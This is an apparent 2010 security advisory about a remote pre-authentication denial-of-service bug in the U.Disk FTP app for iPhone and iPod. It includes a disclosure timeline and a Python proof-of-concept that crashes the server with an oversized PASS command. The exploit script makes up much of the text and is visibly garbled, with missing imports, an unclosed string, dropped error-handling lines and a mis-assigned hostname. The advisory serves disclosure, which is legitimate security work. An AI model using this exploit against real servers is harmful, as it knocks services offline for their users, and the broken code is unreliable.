Exploit Code: http://triviasecurity.net/exploits/Apple-Iphone-Ipod-Udisk-FTP-basic-edition-Remote-pre-auth-DOS-vulnerability/1824
Impact: Dos,Remotely Exploitable
Affected Software: Apple Iphone and Ipod
Description: From the vendor website:
U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk.
002 : Vulnerability details
Remote Denial of Service:
When the application is sent a password (PASS) command with characters of size 2047 the application crashs. Remote code execution maybe possible.
003 : Vendor communication
[*] 3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure
004 : Exploit/PoC
print "[+] Apple Iphone/Ipod Udisk FTP basic edition 0day Remote DOS exploit"
print ("Usage: ./udisk.py \n")
print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
hostname = sys.argv
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to the target.."
print ("[-] Connection error!")
print "[+] Sending payload.."
sock.send("USER %s\r\n" %username)
sock.send("PASS %s\r\n" %passwd)
print "[+] Server is now DOS'ed ;)"
No Solution Till Date
Feedback: If you have additional information or corrections for this security advisory please contact us at advisory(at)triviasecurity.org